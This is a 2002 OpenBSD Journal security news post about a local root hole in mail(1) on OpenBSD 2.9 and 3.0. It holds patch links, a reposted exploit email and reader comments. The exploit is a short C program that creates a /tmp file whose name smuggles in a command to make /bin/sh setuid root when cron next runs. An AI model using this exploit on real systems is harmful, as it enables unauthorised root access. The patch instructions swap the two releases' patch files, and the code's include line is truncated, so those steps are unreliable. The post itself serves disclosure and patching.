OpenBSD Journal

Local root compromise in OpenBSD 3.0 and earlier

Contributed by Dengue on from the security dept.

Bill Schaub writes :
"The mail(1) program can be made to execute arbitrary code in non interactive mode. this can be exploited using cron and the system startup scripts (by any local user with no privs) a patch is and advisory is available on the advisory page.

the 2.9 patch is at ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/023_mail.patch the 3.0 patch is at ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/018_mail.patch

the fix has also been applied to the stable branches."

There is an exploit for this in the wild, from ViPER:


Subject: 2.9 3.0 local root exploit worth posting ;)
   Date: Fri, 12 Apr 2002 16:05:55 +0200 (CEST)
   From: ViPER / DMRT


     To: webmaster@deadly.org
     CC: ghost@dmrt.net

http://www.securitydatabase.net/forum/viewtopic.php?TopicID=3935#8314
http://www.bsdaemon.be/article.php?sid=302&mode=thread&order=0




/*
* (c) 2002 venglin@freebsd.lublin.pl
*
* OpenBSD 3.0 (before 08 Apr 2002)
* /etc/security + /usr/bin/mail local root exploit
*
* Run the exploit and wait for /etc/daily executed from crontab.
* /bin/sh will be suid root next day morning.
*
* Credit goes to urbanek@openbsd.cz for discovering vulnerability.
*
*/

#include

int main(void)
{
int fd;

chdir("/tmp");
fd = open(" ~!chmod +s `perl -e 'print "5714215115657163150"'` ",
O_CREAT|O_WRONLY, 04777);

if (fd)
close(fd);
}



OpenBSD v3.0

cd /usr/src
ncftpget
ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/023_mail.patch
patch -p0
<023_mail.patch
cd usr.bin/mail
 make cleandir
 make obj
 make depend
 make && make install
 
 
 OpenBSD v2.9
 
 cd /usr/src
 ncftpget
 ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/018_mail.patch
 patch -p0 < 018_mail.patch
 cd usr.bin/mail
 make cleandir
 make obj
 make depend
 make && make install
 

(Comments are closed)


Comments
  1. By Anonymous Coward () on

    Isn’t this like the third local root exploit within 6 months. I am glad that we are getting told about each of these exploits, don’t get me wrong, but what has happened in the last couple of months to make OBSD so “vulnerable”?? Has there been less testing between releases?? OBSD’s three local root exploits in 6 months is WAY better than Redhat’s crack-of-the-week, I am just wondering if I/We are slacking on bug finding/reporting.

  2. By Chris () on http://www.dejection.org.uk/

    Ahh shit happens. Everyone makes mistakes.

    Just comparing OpenBSD to anything else, at least we know about this and have a fix for it, as I'm sure we wouldnt if it was an MS OS.

    Follow NTbugtraq and you'll see what I mean.

    I have to use both systems and I can tell you I'm a million times happier using OpenBSD on my systems!

  3. By Anonymous Coward () on


    At least it's not a remote hole.

  4. By bengt kleberg () eleberg@cbe.ericsson.se on mailto:eleberg@cbe.ericsson.se

    ie, would a change to postfix have avoided this problem?


    bengt

Credits

Copyright © - Daniel Hartmeier. All rights reserved. Articles and comments are copyright their respective authors, submission implies license to publish on this web site. Contents of the archive prior to as well as images and HTML templates were copied from the fabulous original deadly.org with Jose's and Jim's kind permission. This journal runs as CGI with httpd(8) on OpenBSD, the source code is BSD licensed. undeadly \Un*dead"ly\, a. Not subject to death; immortal. [Obs.]